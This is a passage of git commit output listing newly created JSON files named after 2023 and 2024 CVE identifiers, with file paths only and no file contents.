2023/CVE-2023-50917.json create mode 100644 2023/CVE-2023-51000.json create mode 100644 2023/CVE-2023-51073.json create mode 100644 2023/CVE-2023-51119.json create mode 100644 2023/CVE-2023-51126.json create mode 100644 2023/CVE-2023-51127.json create mode 100644 2023/CVE-2023-51214.json create mode 100644 2023/CVE-2023-51281.json create mode 100644 2023/CVE-2023-51385.json create mode 100644 2023/CVE-2023-51409.json create mode 100644 2023/CVE-2023-5142.json create mode 100644 2023/CVE-2023-51448.json create mode 100644 2023/CVE-2023-51467.json create mode 100644 2023/CVE-2023-51504.json create mode 100644 2023/CVE-2023-51518.json create mode 100644 2023/CVE-2023-51764.json create mode 100644 2023/CVE-2023-5178.json create mode 100644 2023/CVE-2023-51800.json create mode 100644 2023/CVE-2023-51801.json create mode 100644 2023/CVE-2023-51802.json create mode 100644 2023/CVE-2023-51810.json create mode 100644 2023/CVE-2023-5204.json create mode 100644 2023/CVE-2023-52160.json create mode 100644 2023/CVE-2023-5217.json create mode 100644 2023/CVE-2023-52251.json create mode 100644 2023/CVE-2023-52268.json create mode 100644 2023/CVE-2023-52654.json create mode 100644 2023/CVE-2023-52709.json create mode 100644 2023/CVE-2023-5324.json create mode 100644 2023/CVE-2023-5360.json create mode 100644 2023/CVE-2023-5412.json create mode 100644 2023/CVE-2023-5521.json create mode 100644 2023/CVE-2023-5538.json create mode 100644 2023/CVE-2023-5539.json create mode 100644 2023/CVE-2023-5540.json create mode 100644 2023/CVE-2023-5546.json create mode 100644 2023/CVE-2023-5561.json create mode 100644 2023/CVE-2023-5717.json create mode 100644 2023/CVE-2023-5720.json create mode 100644 2023/CVE-2023-5808.json create mode 100644 2023/CVE-2023-5961.json create mode 100644 2023/CVE-2023-5965.json create mode 100644 2023/CVE-2023-5966.json create mode 100644 2023/CVE-2023-6000.json create mode 100644 2023/CVE-2023-6019.json create mode 100644 2023/CVE-2023-6036.json create mode 100644 2023/CVE-2023-6063.json create mode 100644 2023/CVE-2023-6241.json create mode 100644 2023/CVE-2023-6246.json create mode 100644 2023/CVE-2023-6275.json create mode 100644 2023/CVE-2023-6289.json create mode 100644 2023/CVE-2023-6319.json create mode 100644 2023/CVE-2023-6350.json create mode 100644 2023/CVE-2023-6421.json create mode 100644 2023/CVE-2023-6444.json create mode 100644 2023/CVE-2023-6538.json create mode 100644 2023/CVE-2023-6553.json create mode 100644 2023/CVE-2023-6567.json create mode 100644 2023/CVE-2023-6595.json create mode 100644 2023/CVE-2023-6634.json create mode 100644 2023/CVE-2023-6654.json create mode 100644 2023/CVE-2023-6661.json create mode 100644 2023/CVE-2023-6663.json create mode 100644 2023/CVE-2023-6700.json create mode 100644 2023/CVE-2023-6702.json create mode 100644 2023/CVE-2023-6710.json create mode 100644 2023/CVE-2023-6875.json create mode 100644 2023/CVE-2023-6895.json create mode 100644 2023/CVE-2023-6931.json create mode 100644 2023/CVE-2023-6933.json create mode 100644 2023/CVE-2023-6985.json create mode 100644 2023/CVE-2023-7016.json create mode 100644 2023/CVE-2023-7028.json create mode 100644 2023/CVE-2023-7172.json create mode 100644 2023/CVE-2023-7173.json create mode 100644 2023/CVE-2023-7261.json create mode 100644 2024/CVE-2024-0012.json create mode 100644 2024/CVE-2024-0015.json create mode 100644 2024/CVE-2024-0023.json create mode 100644 2024/CVE-2024-0030.json create mode 100644 2024/CVE-2024-0039.json create mode 100644 2024/CVE-2024-0040.json create mode 100644 2024/CVE-2024-0044.json create mode 100644 2024/CVE-2024-0049.json create mode 100644 2024/CVE-2024-0195.json create mode 100644 2024/CVE-2024-0197.json create mode 100644 2024/CVE-2024-0204.json create mode 100644 2024/CVE-2024-0230.json create mode 100644 2024/CVE-2024-0235.json create mode 100644 2024/CVE-2024-0305.json create mode 100644 2024/CVE-2024-0311.json create mode 100644 2024/CVE-2024-0324.json create mode 100644 2024/CVE-2024-0352.json create mode 100644 2024/CVE-2024-0379.json create mode 100644 2024/CVE-2024-0399.json create mode 100644 2024/CVE-2024-0507.json create mode 100644 2024/CVE-2024-0509.json create mode 100644 2024/CVE-2024-0566.json create mode 100644 2024/CVE-2024-0582.json create mode 100644 2024/CVE-2024-0588.json create mode 100644 2024/CVE-2024-0590.json create mode 100644 2024/CVE-2024-0623.json create mode 100644 2024/CVE-2024-0624.json create mode 100644 2024/CVE-2024-0679.json create mode 100644 2024/CVE-2024-0683.json create mode 100644 2024/CVE-2024-0684.json create mode 100644 2024/CVE-2024-0710.json create mode 100644 2024/CVE-2024-0713.json create mode 100644 2024/CVE-2024-0741.json create mode 100644 2024/CVE-2024-0757.json create mode 100644 2024/CVE-2024-0762.json create mode 100644 2024/CVE-2024-0783.json create mode 100644 2024/CVE-2024-0944.json create mode 100644 2024/CVE-2024-0986.json create mode 100644 2024/CVE-2024-10015.json create mode 100644 2024/CVE-2024-10124.json create mode 100644 2024/CVE-2024-10140.json create mode 100644 2024/CVE-2024-10220.json create mode 100644 2024/CVE-2024-10245.json create mode 100644 2024/CVE-2024-10354.json create mode 100644 2024/CVE-2024-10355.json create mode 100644 2024/CVE-2024-10400.json create mode 100644 2024/CVE-2024-10410.json create mode 100644 2024/CVE-2024-10448.json create mode 100644 2024/CVE-2024-10449.json create mode 100644 2024/CVE-2024-10470.json create mode 100644 2024/CVE-2024-10508.json create mode 100644 2024/CVE-2024-10511.json create mode 100644 2024/CVE-2024-10516.json create mode 100644 2024/CVE-2024-10542.json create mode 100644 2024/CVE-2024-10557.json create mode 100644 2024/CVE-2024-10586.json create mode 100644 2024/CVE-2024-10592.json create mode 100644 2024/CVE-2024-10605.json create mode 100644 2024/CVE-2024-10629.json create mode 100644 2024/CVE-2024-10654.json create mode 100644 2024/CVE-2024-1071.json create mode 100644 2024/CVE-2024-10728.json create mode 100644 2024/CVE-2024-10793.json create mode 100644 2024/CVE-2024-1086.json create mode 100644 2024/CVE-2024-10914.json create mode 100644 2024/CVE-2024-10924.json create mode 100644 2024/CVE-2024-10958.json create mode 100644 2024/CVE-2024-11003.json create mode 100644 2024/CVE-2024-1112.json create mode 100644 2024/CVE-2024-11199.json create mode 100644 2024/CVE-2024-11201.json create mode 100644 2024/CVE-2024-11252.json create mode 100644 2024/CVE-2024-11281.json create mode 100644 2024/CVE-2024-11318.json create mode 100644 2024/CVE-2024-11320.json create mode 100644 2024/CVE-2024-11381.json create mode 100644 2024/CVE-2024-11387.json create mode 100644 2024/CVE-2024-11388.json create mode 100644 2024/CVE-2024-11392.json create mode 100644 2024/CVE-2024-11393.json create mode 100644 2024/CVE-2024-11394.json create mode 100644 2024/CVE-2024-11412.json create mode 100644 2024/CVE-2024-11428.json create mode 100644 2024/CVE-2024-11432.json create mode 100644 2024/CVE-2024-11477.json create mode 100644 2024/CVE-2024-11616.json create mode 100644 2024/CVE-2024-11643.json create mode 100644 2024/CVE-2024-11680.json create mode 100644 2024/CVE-2024-11728.json create mode 100644 2024/CVE-2024-11972.json create mode 100644 2024/CVE-2024-12025.json create mode 100644 2024/CVE-2024-1207.json create mode 100644 2024/CVE-2024-1208.json create mode 100644 2024/CVE-2024-1209.json create mode 100644 2024/CVE-2024-1212.json create mode 100644 2024/CVE-2024-12155.json create mode 100644 2024/CVE-2024-12172.json create mode 100644 2024/CVE-2024-12209.json create mode 100644 2024/CVE-2024-12270.json create mode 100644 2024/CVE-2024-12345.json create mode 100644 2024/CVE-2024-12356.json create mode 100644 2024/CVE-2024-12484.json create mode 100644 2024/CVE-2024-1269.json create mode 100644 2024/CVE-2024-12849.json create mode 100644 2024/CVE-2024-12883.json create mode 100644 2024/CVE-2024-12970.json create mode 100644 2024/CVE-2024-12986.json create mode 100644 2024/CVE-2024-1301.json create mode 100644 2024/CVE-2024-1302.json create mode 100644 2024/CVE-2024-1303.json create mode 100644 2024/CVE-2024-1304.json create mode 100644 2024/CVE-2024-1346.json create mode 100644 2024/CVE-2024-1380.json create mode 100644 2024/CVE-2024-1403.json create mode 100644 2024/CVE-2024-1441.json create mode 100644 2024/CVE-2024-1512.json create mode 100644 2024/CVE-2024-1561.json create mode 100644 2024/CVE-2024-1642470.json create mode 100644 2024/CVE-2024-1651.json create mode 100644 2024/CVE-2024-1655.json create mode 100644 2024/CVE-2024-1698.json create mode 100644 2024/CVE-2024-1709.json create mode 100644 2024/CVE-2024-1781.json create mode 100644 2024/CVE-2024-1874.json create mode 100644 2024/CVE-2024-1931.json create mode 100644 2024/CVE-2024-1939.json create mode 100644 2024/CVE-2024-20017.json create mode 100644 2024/CVE-2024-20137.json create mode 100644 2024/CVE-2024-20291.json create mode 100644 2024/CVE-2024-20338.json create mode 100644 2024/CVE-2024-20356.json create mode 100644 2024/CVE-2024-20404.json create mode 100644 2024/CVE-2024-20405.json create mode 100644 2024/CVE-2024-20467.json create mode 100644 2024/CVE-2024-2054.json create mode 100644 2024/CVE-2024-20656.json create mode 100644 2024/CVE-2024-20666.json create mode 100644 2024/CVE-2024-20696.json create mode 100644 2024/CVE-2024-20698.json create mode 100644 2024/CVE-2024-2074.json create mode 100644 2024/CVE-2024-20746.json create mode 100644 2024/CVE-2024-20767.json create mode 100644 2024/CVE-2024-20931.json create mode 100644 2024/CVE-2024-21006.json create mode 100644 2024/CVE-2024-21107.json create mode 100644 2024/CVE-2024-21111.json create mode 100644 2024/CVE-2024-21182.json create mode 100644 2024/CVE-2024-21305.json create mode 100644 2024/CVE-2024-21306.json create mode 100644 2024/CVE-2024-21320.json create mode 100644 2024/CVE-2024-21338.json create mode 100644 2024/CVE-2024-21345.json create mode 100644 2024/CVE-2024-21378.json create mode 100644 2024/CVE-2024-21388.json create mode 100644 2024/CVE-2024-21412.json create mode 100644 2024/CVE-2024-21413.json create mode 100644 2024/CVE-2024-21514.json create mode 100644 2024/CVE-2024-21520.json create mode 100644 2024/CVE-2024-21534.json create mode 100644 2024/CVE-2024-21542.json create mode 100644 2024/CVE-2024-21626.json create mode 100644 2024/CVE-2024-21633.json create mode 100644 2024/CVE-2024-21644.json create mode 100644 2024/CVE-2024-21683.json create mode 100644 2024/CVE-2024-21689.json create mode 100644 2024/CVE-2024-2169.json create mode 100644 2024/CVE-2024-21733.json create mode 100644 2024/CVE-2024-21754.json create mode 100644 2024/CVE-2024-21762.json create mode 100644 2024/CVE-2024-21793.json create mode 100644 2024/CVE-2024-2188.json create mode 100644 2024/CVE-2024-21887.json create mode 100644 2024/CVE-2024-21893.json create mode 100644 2024/CVE-2024-2193.json create mode 100644 2024/CVE-2024-21978.json create mode 100644 2024/CVE-2024-21980.json create mode 100644 2024/CVE-2024-22002.json create mode 100644 2024/CVE-2024-22024.json create mode 100644 2024/CVE-2024-22026.json create mode 100644 2024/CVE-2024-22120.json create mode 100644 2024/CVE-2024-22145.json create mode 100644 2024/CVE-2024-22198.json create mode 100644 2024/CVE-2024-22243.json create mode 100644 2024/CVE-2024-22262.json create mode 100644 2024/CVE-2024-22263.json create mode 100644 2024/CVE-2024-22274.json create mode 100644 2024/CVE-2024-22275.json create mode 100644 2024/CVE-2024-22369.json create mode 100644 2024/CVE-2024-22393.json create mode 100644 2024/CVE-2024-22411.json create mode 100644 2024/CVE-2024-22416.json create mode 100644 2024/CVE-2024-2242.json create mode 100644 2024/CVE-2024-22514.json create mode 100644 2024/CVE-2024-22515.json create mode 100644 2024/CVE-2024-22526.json create mode 100644 2024/CVE-2024-22532.json create mode 100644 2024/CVE-2024-22534.json create mode 100644 2024/CVE-2024-2257.json create mode 100644 2024/CVE-2024-22640.json create mode 100644 2024/CVE-2024-22641.json create mode 100644 2024/CVE-2024-22734.json create mode 100644 2024/CVE-2024-22752.json create mode 100644 2024/CVE-2024-22774.json create mode 100644 2024/CVE-2024-22853.json create mode 100644 2024/CVE-2024-22867.json create mode 100644 2024/CVE-2024-22889.json create mode 100644 2024/CVE-2024-22890.json create mode 100644 2024/CVE-2024-22891.json create mode 100644 2024/CVE-2024-22894.json create mode 100644 2024/CVE-2024-22899.json create mode 100644 2024/CVE-2024-22909.json create mode 100644 2024/CVE-2024-22922.json create mode 100644 2024/CVE-2024-22939.json create mode 100644 2024/CVE-2024-22983.json create mode 100644 2024/CVE-2024-23002.json create mode 100644 2024/CVE-2024-23108.json create mode 100644 2024/CVE-2024-23113.json create mode 100644 2024/CVE-2024-23208.json create mode 100644 2024/CVE-2024-23298.json create mode 100644 2024/CVE-2024-23334.json create mode 100644 2024/CVE-2024-23339.json create mode 100644 2024/CVE-2024-23346.json create mode 100644 2024/CVE-2024-23443.json create mode 100644 2024/CVE-2024-23652.json create mode 100644 2024/CVE-2024-23653.json create mode 100644 2024/CVE-2024-23692.json create mode 100644 2024/CVE-2024-23708.json create mode 100644 2024/CVE-2024-23709.json create mode 100644 2024/CVE-2024-23722.json create mode 100644 2024/CVE-2024-23727.json create mode 100644 2024/CVE-2024-23738.json create mode 100644 2024/CVE-2024-23739.json create mode 100644 2024/CVE-2024-23740.json create mode 100644 2024/CVE-2024-23741.json create mode 100644 2024/CVE-2024-23742.json create mode 100644 2024/CVE-2024-23743.json create mode 100644 2024/CVE-2024-23745.json create mode 100644 2024/CVE-2024-23746.json create mode 100644 2024/CVE-2024-23747.json create mode 100644 2024/CVE-2024-23772.json create mode 100644 2024/CVE-2024-23773.json create mode 100644 2024/CVE-2024-23774.json create mode 100644 2024/CVE-2024-23780.json create mode 100644 2024/CVE-2024-2389.json create mode 100644 2024/CVE-2024-23897.json create mode 100644 2024/CVE-2024-23995.json create mode 100644 2024/CVE-2024-23997.json create mode 100644 2024/CVE-2024-23998.json create mode 100644 2024/CVE-2024-24034.json create mode 100644 2024/CVE-2024-24035.json create mode 100644 2024/CVE-2024-24134.json create mode 100644 2024/CVE-2024-24135.json create mode 100644 2024/CVE-2024-24136.json create mode 100644 2024/CVE-2024-24137.json create mode 100644 2024/CVE-2024-24138.json create mode 100644 2024/CVE-2024-24139.json create mode 100644 2024/CVE-2024-24140.json create mode 100644 2024/CVE-2024-24141.json create mode 100644 2024/CVE-2024-24142.json create mode 100644 2024/CVE-2024-2432.json create mode 100644 2024/CVE-2024-24336.json create mode 100644 2024/CVE-2024-24337.json create mode 100644 2024/CVE-2024-24386.json create mode 100644 2024/CVE-2024-24396.json create mode 100644 2024/CVE-2024-24397.json create mode 100644 2024/CVE-2024-24398.json create mode 100644 2024/CVE-2024-24401.json create mode 100644 2024/CVE-2024-24402.json create mode 100644 2024/CVE-2024-24409.json create mode 100644 2024/CVE-2024-24488.json create mode 100644 2024/CVE-2024-24549.json create mode 100644 2024/CVE-2024-24576.json create mode 100644 2024/CVE-2024-24590.json create mode 100644 2024/CVE-2024-24684.json create mode 100644 2024/CVE-2024-24685.json create mode 100644 2024/CVE-2024-24686.json create mode 100644 2024/CVE-2024-24725.json create mode 100644 2024/CVE-2024-24760.json create mode 100644 2024/CVE-2024-24787.json create mode 100644 2024/CVE-2024-24809.json create mode 100644 2024/CVE-2024-24816.json create mode 100644 2024/CVE-2024-24919.json create mode 100644 2024/CVE-2024-24926.json create mode 100644 2024/CVE-2024-25092.json create mode 100644 2024/CVE-2024-25153.json create mode 100644 2024/CVE-2024-25169.json create mode 100644 2024/CVE-2024-25170.json create mode 100644 2024/CVE-2024-25175.json create mode 100644 2024/CVE-2024-25202.json create mode 100644 2024/CVE-2024-25227.json create mode 100644 2024/CVE-2024-25277.json create mode 100644 2024/CVE-2024-25278.json create mode 100644 2024/CVE-2024-25279.json create mode 100644 2024/CVE-2024-25280.json create mode 100644 2024/CVE-2024-25281.json create mode 100644 2024/CVE-2024-25291.json create mode 100644 2024/CVE-2024-25292.json create mode 100644 2024/CVE-2024-25293.json create mode 100644 2024/CVE-2024-25376.json create mode 100644 2024/CVE-2024-25381.json create mode 100644 2024/CVE-2024-25411.json create mode 100644 2024/CVE-2024-25412.json create mode 100644 2024/CVE-2024-25423.json create mode 100644 2024/CVE-2024-25466.json create mode 100644 2024/CVE-2024-25503.json create mode 100644 2024/CVE-2024-25600.json create mode 100644 2024/CVE-2024-25641.json create mode 100644 2024/CVE-2024-25723.json create mode 100644 2024/CVE-2024-25731.json create mode 100644 2024/CVE-2024-25733.json create mode 100644 2024/CVE-2024-25809.json create mode 100644 2024/CVE-2024-25832.json create mode 100644 2024/CVE-2024-25897.json create mode 100644 2024/CVE-2024-26026.json create mode 100644 2024/CVE-2024-26144.json create mode 100644 2024/CVE-2024-26160.json create mode 100644 2024/CVE-2024-26218.json create mode 100644 2024/CVE-2024-26229.json create mode 100644 2024/CVE-2024-26230.json create mode 100644 2024/CVE-2024-26304.json create mode 100644 2024/CVE-2024-26308.json create mode 100644 2024/CVE-2024-26475.json create mode 100644 2024/CVE-2024-26503.json create mode 100644 2024/CVE-2024-26521.json create mode 100644 2024/CVE-2024-26534.json create mode 100644 2024/CVE-2024-26535.json create mode 100644 2024/CVE-2024-26560.json create mode 100644 2024/CVE-2024-26574.json create mode 100644 2024/CVE-2024-26581.json create mode 100644 2024/CVE-2024-2667.json create mode 100644 2024/CVE-2024-26817.json create mode 100644 2024/CVE-2024-27088.json create mode 100644 2024/CVE-2024-27130.json create mode 100644 2024/CVE-2024-27173.json create mode 100644 2024/CVE-2024-27198.json create mode 100644 2024/CVE-2024-27292.json create mode 100644 2024/CVE-2024-27316.json create mode 100644 2024/CVE-2024-27348.json create mode 100644 2024/CVE-2024-27460.json create mode 100644 2024/CVE-2024-27462.json create mode 100644 2024/CVE-2024-27474.json create mode 100644 2024/CVE-2024-27518.json create mode 100644 2024/CVE-2024-27564.json create mode 100644 2024/CVE-2024-27619.json create mode 100644 2024/CVE-2024-27630.json create mode 100644 2024/CVE-2024-27631.json create mode 100644 2024/CVE-2024-27632.json create mode 100644 2024/CVE-2024-27665.json create mode 100644 2024/CVE-2024-27673.json create mode 100644 2024/CVE-2024-27674.json create mode 100644 2024/CVE-2024-27697.json create mode 100644 2024/CVE-2024-27766.json create mode 100644 2024/CVE-2024-27804.json create mode 100644 2024/CVE-2024-27815.json create mode 100644 2024/CVE-2024-27821.json create mode 100644 2024/CVE-2024-27914.json create mode 100644 2024/CVE-2024-27954.json create mode 100644 2024/CVE-2024-27956.json create mode 100644 2024/CVE-2024-27971.json create mode 100644 2024/CVE-2024-27972.json create mode 100644 2024/CVE-2024-27983.json create mode 100644 2024/CVE-2024-28000.json create mode 100644 2024/CVE-2024-28085.json create mode 100644 2024/CVE-2024-28088.json create mode 100644 2024/CVE-2024-28116.json create mode 100644 2024/CVE-2024-28247.json create mode 100644 2024/CVE-2024-28255.json create mode 100644 2024/CVE-2024-28397.json create mode 100644 2024/CVE-2024-28515.json create mode 100644 2024/CVE-2024-28589.json create mode 100644 2024/CVE-2024-28715.json create mode 100644 2024/CVE-2024-28741.json create mode 100644 2024/CVE-2024-28757.json create mode 100644 2024/CVE-2024-2876.json create mode 100644 2024/CVE-2024-2879.json create mode 100644 2024/CVE-2024-2887.json create mode 100644 2024/CVE-2024-28987.json create mode 100644 2024/CVE-2024-28995.json create mode 100644 2024/CVE-2024-28999.json create mode 100644 2024/CVE-2024-29050.json create mode 100644 2024/CVE-2024-29059.json create mode 100644 2024/CVE-2024-29269.json create mode 100644 2024/CVE-2024-29272.json create mode 100644 2024/CVE-2024-29275.json create mode 100644 2024/CVE-2024-29278.json create mode 100644 2024/CVE-2024-2928.json create mode 100644 2024/CVE-2024-29296.json create mode 100644 2024/CVE-2024-29375.json create mode 100644 2024/CVE-2024-29399.json create mode 100644 2024/CVE-2024-29404.json create mode 100644 2024/CVE-2024-29415.json create mode 100644 2024/CVE-2024-29510.json create mode 100644 2024/CVE-2024-2961.json create mode 100644 2024/CVE-2024-29671.json create mode 100644 2024/CVE-2024-29824.json create mode 100644 2024/CVE-2024-29847.json create mode 100644 2024/CVE-2024-29849.json create mode 100644 2024/CVE-2024-29855.json create mode 100644 2024/CVE-2024-29863.json create mode 100644 2024/CVE-2024-29868.json create mode 100644 2024/CVE-2024-29895.json create mode 100644 2024/CVE-2024-29943.json create mode 100644 2024/CVE-2024-2997.json create mode 100644 2024/CVE-2024-29972.json create mode 100644 2024/CVE-2024-29973.json create mode 100644 2024/CVE-2024-29988.json create mode 100644 2024/CVE-2024-30043.json create mode 100644 2024/CVE-2024-30051.json create mode 100644 2024/CVE-2024-30052.json create mode 100644 2024/CVE-2024-30056.json create mode 100644 2024/CVE-2024-30085.json create mode 100644 2024/CVE-2024-30088.json create mode 100644 2024/CVE-2024-30090.json create mode 100644 2024/CVE-2024-30212.json create mode 100644 2024/CVE-2024-30255.json create mode 100644 2024/CVE-2024-30270.json create mode 100644 2024/CVE-2024-30491.json create mode 100644 2024/CVE-2024-30614.json create mode 100644 2024/CVE-2024-30656.json create mode 100644 2024/CVE-2024-30850.json create mode 100644 2024/CVE-2024-30851.json create mode 100644 2024/CVE-2024-30875.json create mode 100644 2024/CVE-2024-30896.json create mode 100644 2024/CVE-2024-3094.json create mode 100644 2024/CVE-2024-30956.json create mode 100644 2024/CVE-2024-30973.json create mode 100644 2024/CVE-2024-30998.json create mode 100644 2024/CVE-2024-3105.json create mode 100644 2024/CVE-2024-3116.json create mode 100644 2024/CVE-2024-31211.json create mode 100644 2024/CVE-2024-31317.json create mode 100644 2024/CVE-2024-31319.json create mode 100644 2024/CVE-2024-31351.json create mode 100644 2024/CVE-2024-31497.json create mode 100644 2024/CVE-2024-31666.json create mode 100644 2024/CVE-2024-31719.json create mode 100644 2024/CVE-2024-3177.json create mode 100644 2024/CVE-2024-31771.json create mode 100644 2024/CVE-2024-31777.json create mode 100644 2024/CVE-2024-31819.json create mode 100644 2024/CVE-2024-3183.json create mode 100644 2024/CVE-2024-31835.json create mode 100644 2024/CVE-2024-31848.json create mode 100644 2024/CVE-2024-31974.json create mode 100644 2024/CVE-2024-31982.json create mode 100644 2024/CVE-2024-31989.json create mode 100644 2024/CVE-2024-32002.json create mode 100644 2024/CVE-2024-32004.json create mode 100644 2024/CVE-2024-32030.json create mode 100644 2024/CVE-2024-32104.json create mode 100644 2024/CVE-2024-32113.json create mode 100644 2024/CVE-2024-32136.json create mode 100644 2024/CVE-2024-3217.json create mode 100644 2024/CVE-2024-32205.json create mode 100644 2024/CVE-2024-32238.json create mode 100644 2024/CVE-2024-32258.json create mode 100644 2024/CVE-2024-32369.json create mode 100644 2024/CVE-2024-32370.json create mode 100644 2024/CVE-2024-32371.json create mode 100644 2024/CVE-2024-32399.json create mode 100644 2024/CVE-2024-32459.json create mode 100644 2024/CVE-2024-32523.json create mode 100644 2024/CVE-2024-32640.json create mode 100644 2024/CVE-2024-32651.json create mode 100644 2024/CVE-2024-32700.json create mode 100644 2024/CVE-2024-32709.json create mode 100644 2024/CVE-2024-3272.json create mode 100644 2024/CVE-2024-3273.json create mode 100644 2024/CVE-2024-3293.json create mode 100644 2024/CVE-2024-33111.json create mode 100644 2024/CVE-2024-33113.json create mode 100644 2024/CVE-2024-33209.json create mode 100644 2024/CVE-2024-33210.json create mode 100644 2024/CVE-2024-33231.json create mode 100644 2024/CVE-2024-33352.json create mode 100644 2024/CVE-2024-33453.json create mode 100644 2024/CVE-2024-33559.json create mode 100644 2024/CVE-2024-33644.json create mode 100644 2024/CVE-2024-33722.json create mode 100644 2024/CVE-2024-33775.json create mode 100644 2024/CVE-2024-33883.json create mode 100644 2024/CVE-2024-33901.json create mode 100644 2024/CVE-2024-33911.json create mode 100644 2024/CVE-2024-3393.json create mode 100644 2024/CVE-2024-3400.json create mode 100644 2024/CVE-2024-34102.json create mode 100644 2024/CVE-2024-34144.json create mode 100644 2024/CVE-2024-34220.json create mode 100644 2024/CVE-2024-34221.json create mode 100644 2024/CVE-2024-34222.json create mode 100644 2024/CVE-2024-34223.json create mode 100644 2024/CVE-2024-34224.json create mode 100644 2024/CVE-2024-34225.json create mode 100644 2024/CVE-2024-34226.json create mode 100644 2024/CVE-2024-34310.json create mode 100644 2024/CVE-2024-34312.json create mode 100644 2024/CVE-2024-34313.json create mode 100644 2024/CVE-2024-34329.json create mode 100644 2024/CVE-2024-3435.json create mode 100644 2024/CVE-2024-34350.json create mode 100644 2024/CVE-2024-34351.json create mode 100644 2024/CVE-2024-34361.json create mode 100644 2024/CVE-2024-34452.json create mode 100644 2024/CVE-2024-34463.json create mode 100644 2024/CVE-2024-34469.json create mode 100644 2024/CVE-2024-34470.json create mode 100644 2024/CVE-2024-34471.json create mode 100644 2024/CVE-2024-34472.json create mode 100644 2024/CVE-2024-34474.json create mode 100644 2024/CVE-2024-34582.json create mode 100644 2024/CVE-2024-34693.json create mode 100644 2024/CVE-2024-34716.json create mode 100644 2024/CVE-2024-34739.json create mode 100644 2024/CVE-2024-34741.json create mode 100644 2024/CVE-2024-34831.json create mode 100644 2024/CVE-2024-34833.json create mode 100644 2024/CVE-2024-3495.json create mode 100644 2024/CVE-2024-34958.json create mode 100644 2024/CVE-2024-35133.json create mode 100644 2024/CVE-2024-35176.json create mode 100644 2024/CVE-2024-35205.json create mode 100644 2024/CVE-2024-35242.json create mode 100644 2024/CVE-2024-35250.json create mode 100644 2024/CVE-2024-35286.json create mode 100644 2024/CVE-2024-35315.json create mode 100644 2024/CVE-2024-35333.json create mode 100644 2024/CVE-2024-35468.json create mode 100644 2024/CVE-2024-35469.json create mode 100644 2024/CVE-2024-35475.json create mode 100644 2024/CVE-2024-35511.json create mode 100644 2024/CVE-2024-3552.json create mode 100644 2024/CVE-2024-35538.json create mode 100644 2024/CVE-2024-35584.json create mode 100644 2024/CVE-2024-3596.json create mode 100644 2024/CVE-2024-36079.json create mode 100644 2024/CVE-2024-36104.json create mode 100644 2024/CVE-2024-36401.json create mode 100644 2024/CVE-2024-36416.json create mode 100644 2024/CVE-2024-36424.json create mode 100644 2024/CVE-2024-36527.json create mode 100644 2024/CVE-2024-36539.json create mode 100644 2024/CVE-2024-3656.json create mode 100644 2024/CVE-2024-36821.json create mode 100644 2024/CVE-2024-36823.json create mode 100644 2024/CVE-2024-36837.json create mode 100644 2024/CVE-2024-36842.json create mode 100644 2024/CVE-2024-36877.json create mode 100644 2024/CVE-2024-3690.json create mode 100644 2024/CVE-2024-36991.json create mode 100644 2024/CVE-2024-37032.json create mode 100644 2024/CVE-2024-37051.json create mode 100644 2024/CVE-2024-37081.json create mode 100644 2024/CVE-2024-37084.json create mode 100644 2024/CVE-2024-37085.json create mode 100644 2024/CVE-2024-37147.json create mode 100644 2024/CVE-2024-37383.json create mode 100644 2024/CVE-2024-37393.json create mode 100644 2024/CVE-2024-37726.json create mode 100644 2024/CVE-2024-37742.json create mode 100644 2024/CVE-2024-37759.json create mode 100644 2024/CVE-2024-37762.json create mode 100644 2024/CVE-2024-37763.json create mode 100644 2024/CVE-2024-37764.json create mode 100644 2024/CVE-2024-37765.json create mode 100644 2024/CVE-2024-37770.json create mode 100644 2024/CVE-2024-37791.json create mode 100644 2024/CVE-2024-37843.json create mode 100644 2024/CVE-2024-37888.json create mode 100644 2024/CVE-2024-37889.json create mode 100644 2024/CVE-2024-38036.json create mode 100644 2024/CVE-2024-38041.json create mode 100644 2024/CVE-2024-3806.json create mode 100644 2024/CVE-2024-38063.json create mode 100644 2024/CVE-2024-38077.json create mode 100644 2024/CVE-2024-38080.json create mode 100644 2024/CVE-2024-38100.json create mode 100644 2024/CVE-2024-38124.json create mode 100644 2024/CVE-2024-38127.json create mode 100644 2024/CVE-2024-38144.json create mode 100644 2024/CVE-2024-38189.json create mode 100644 2024/CVE-2024-38193.json create mode 100644 2024/CVE-2024-38200.json create mode 100644 2024/CVE-2024-38366.json create mode 100644 2024/CVE-2024-38396.json create mode 100644 2024/CVE-2024-38472.json create mode 100644 2024/CVE-2024-38473.json create mode 100644 2024/CVE-2024-38475.json create mode 100644 2024/CVE-2024-38526.json create mode 100644 2024/CVE-2024-38537.json create mode 100644 2024/CVE-2024-3867.json create mode 100644 2024/CVE-2024-38793.json create mode 100644 2024/CVE-2024-38816.json create mode 100644 2024/CVE-2024-38819.json create mode 100644 2024/CVE-2024-38821.json create mode 100644 2024/CVE-2024-38856.json create mode 100644 2024/CVE-2024-38998.json create mode 100644 2024/CVE-2024-39031.json create mode 100644 2024/CVE-2024-39069.json create mode 100644 2024/CVE-2024-39081.json create mode 100644 2024/CVE-2024-39090.json create mode 100644 2024/CVE-2024-39203.json create mode 100644 2024/CVE-2024-39205.json create mode 100644 2024/CVE-2024-39210.json create mode 100644 2024/CVE-2024-39211.json create mode 100644 2024/CVE-2024-3922.json create mode 100644 2024/CVE-2024-39248.json create mode 100644 2024/CVE-2024-39250.json create mode 100644 2024/CVE-2024-39304.json create mode 100644 2024/CVE-2024-39306.json create mode 100644 2024/CVE-2024-39614.json create mode 100644 2024/CVE-2024-39689.json create mode 100644 2024/CVE-2024-39700.json create mode 100644 2024/CVE-2024-39844.json create mode 100644 2024/CVE-2024-39908.json create mode 100644 2024/CVE-2024-39914.json create mode 100644 2024/CVE-2024-39929.json create mode 100644 2024/CVE-2024-39943.json create mode 100644 2024/CVE-2024-40080.json create mode 100644 2024/CVE-2024-40110.json create mode 100644 2024/CVE-2024-40119.json create mode 100644 2024/CVE-2024-40318.json create mode 100644 2024/CVE-2024-40324.json create mode 100644 2024/CVE-2024-40348.json create mode 100644 2024/CVE-2024-4040.json create mode 100644 2024/CVE-2024-40422.json create mode 100644 2024/CVE-2024-40431.json create mode 100644 2024/CVE-2024-40443.json create mode 100644 2024/CVE-2024-40457.json create mode 100644 2024/CVE-2024-40492.json create mode 100644 2024/CVE-2024-40498.json create mode 100644 2024/CVE-2024-40500.json create mode 100644 2024/CVE-2024-40506.json create mode 100644 2024/CVE-2024-40507.json create mode 100644 2024/CVE-2024-40508.json create mode 100644 2024/CVE-2024-40509.json create mode 100644 2024/CVE-2024-40510.json create mode 100644 2024/CVE-2024-40511.json create mode 100644 2024/CVE-2024-40512.json create mode 100644 